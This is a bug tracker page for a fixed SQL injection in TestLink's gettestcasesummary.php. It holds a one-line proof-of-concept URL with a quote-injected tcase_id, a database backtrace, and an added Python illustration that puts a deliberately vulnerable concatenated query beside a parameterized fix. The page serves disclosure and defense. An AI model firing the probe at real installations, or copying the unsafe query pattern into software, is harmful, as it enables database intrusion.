Mantis Bugtracker          
testlink.org

ID: 0008301
Project: TestLink
Category: Security - SQL Injection
View Status: public
Date Submitted: 2018-06-18 13:00
Last Update: 2018-10-06 12:17
Reporter: Maksymilian Arciemowicz
Assigned To: fman
Priority: urgent
Severity: block
Reproducibility: always
Status: closed
Resolution: fixed
Platform / OS / OS Version: (none given)
Product Version: 1.9.16 (2016 Q4)
Fixed in Version: 1.9.18 (2018 Q3)
Summary: 0008301: SQL Injection gettestcasesummary.php
Description: SQL Injection here

PoC
http://localhost/lib/ajax/gettestcasesummary.php?tcase_id=1%27
Additional Information:
==============================================================================
 DB Access Error - debug_print_backtrace() OUTPUT START
 ATTENTION: Enabling more debug info will produce path disclosure weakness (CWE-200)
            Having this additional Information could be useful for reporting
            issue to development TEAM.
 ==============================================================================
#0 database->exec_query(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' ) called at [/opt/bitnami/testlink/lib/functions/database.class.php:563]
#1 database->fetchFirstRow(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' ) called at [/opt/bitnami/testlink/lib/functions/database.class.php:545]
#2 database->fetchFirstRowSingleColumn(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' , version) called at [/opt/bitnami/testlink/lib/functions/testcase.class.php:1977]
#3 testcase->get_last_version_info(1') called at [/opt/bitnami/testlink/lib/ajax/gettestcasesummary.php:35]
Tags: No tags attached.
Database (MySQL,Postgres,etc): MySQL
Browser: (none given)
PHP Version: (none given)
TestCaseID: (none given)
QA Team - Task Workflow Status: READY FOR TESTING
Attached Files: none
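The backtrace above shows the raw value of tcase_id being spliced into the SQL text inside get_last_version_info, which is why a trailing quote turns into a DB Access Error. As an added illustration (not TestLink's code, and not the linked fix commit, which this page does not show), the Python below stands in for the PHP handler: it reproduces the concatenated query against a constructed in-memory SQLite copy of the two tables named in the query, and places the validated, parameterized form beside it. The table rows, the reduced column set, and the helpers make_db, parse_tcase_id and probe are assumptions made for the demonstration; MySQL would differ only in the wording of the error.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the two tables the backtrace names.
    Assumption: only the columns the query touches are modelled."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE nodes_hierarchy (id INTEGER PRIMARY KEY, parent_id INTEGER);
        CREATE TABLE tcversions (id INTEGER PRIMARY KEY, version INTEGER);
        INSERT INTO nodes_hierarchy (id, parent_id) VALUES (10, 1), (11, 1), (12, 2);
        INSERT INTO tcversions (id, version) VALUES (10, 1), (11, 3), (12, 7);
    """)
    return conn


# The statement from the backtrace, minus the value that was concatenated onto it.
BASE_SQL = ("SELECT MAX(version) AS version FROM tcversions TCV "
            "JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id "
            "WHERE NH_TCV.parent_id = ")


def last_version_unsafe(conn, tcase_id):
    """Vulnerable shape: the request value becomes part of the SQL text.
    A value such as 1' alters the statement itself, producing the unterminated
    quote error that the DB Access Error in the report shows."""
    sql = BASE_SQL + str(tcase_id)
    return conn.execute(sql).fetchone()[0]


def parse_tcase_id(raw):
    """Hardened shape, step 1: the query-string value must be a plain positive
    integer before it is allowed anywhere near the database."""
    if not isinstance(raw, str) or not re.fullmatch(r"[1-9][0-9]*", raw):
        raise ValueError("tcase_id must be a positive integer, got %r" % (raw,))
    return int(raw)


def last_version_safe(conn, tcase_id):
    """Hardened shape, step 2: bind the already validated integer as a parameter,
    so the SQL text is constant no matter what the client sent."""
    if not isinstance(tcase_id, int) or isinstance(tcase_id, bool) or tcase_id < 1:
        raise ValueError("tcase_id must be a positive integer")
    return conn.execute(BASE_SQL + "?", (tcase_id,)).fetchone()[0]


def probe(func, conn, value):
    """Run one lookup and report either the result or the exception class name."""
    try:
        return ("ok", func(conn, value))
    except Exception as exc:  # report whatever the driver or validator raised
        return ("error", type(exc).__name__)


if __name__ == "__main__":
    conn = make_db()
    for raw in ("1", "1'", "2"):
        print("unsafe", repr(raw), probe(last_version_unsafe, conn, raw))
        try:
            tcid = parse_tcase_id(raw)
        except ValueError as exc:
            print("safe  ", repr(raw), ("rejected", str(exc)))
            continue
        print("safe  ", repr(raw), probe(last_version_safe, conn, tcid))
```

Run stand-alone it prints one line per probe for each path. The point to take away is that in the hardened path the statement text never changes, so no client value can extend the WHERE clause, and the integer check rejects 1' before any query is issued, so the DB Access Error seen in the report (and the path disclosure its debug output warns about) is never reached.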

- Relationships

- Notes
(0027600)
fman (administrator)
2018-06-18 17:42

https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/2c85dc8f472f4eedba70a24456be5239dc3045a3
(0027601)
fman (administrator)
2018-06-18 17:42

thanks.
would you mind to test fix?

regards
(0027604)
Maksymilian Arciemowicz (reporter)
2018-06-18 18:11

thanks.. looks well.
(0027942)
fman (administrator)
2018-10-06 12:17

1.9.18 released

- Issue History
Date Modified Username Field Change
2018-06-18 13:00 Maksymilian Arciemowicz New Issue
2018-06-18 17:42 fman QA Team - Task Workflow Status => READY FOR TESTING
2018-06-18 17:42 fman Note Added: 0027600
2018-06-18 17:42 fman Status new => resolved
2018-06-18 17:42 fman Fixed in Version => 1.9.18 (2018 Q3)
2018-06-18 17:42 fman Resolution open => fixed
2018-06-18 17:42 fman Assigned To => fman
2018-06-18 17:42 fman Product Version => 1.9.16 (2016 Q4)
2018-06-18 17:42 fman Note Added: 0027601
2018-06-18 18:11 Maksymilian Arciemowicz Note Added: 0027604
2018-10-06 12:17 fman Note Added: 0027942
2018-10-06 12:17 fman Status resolved => closed


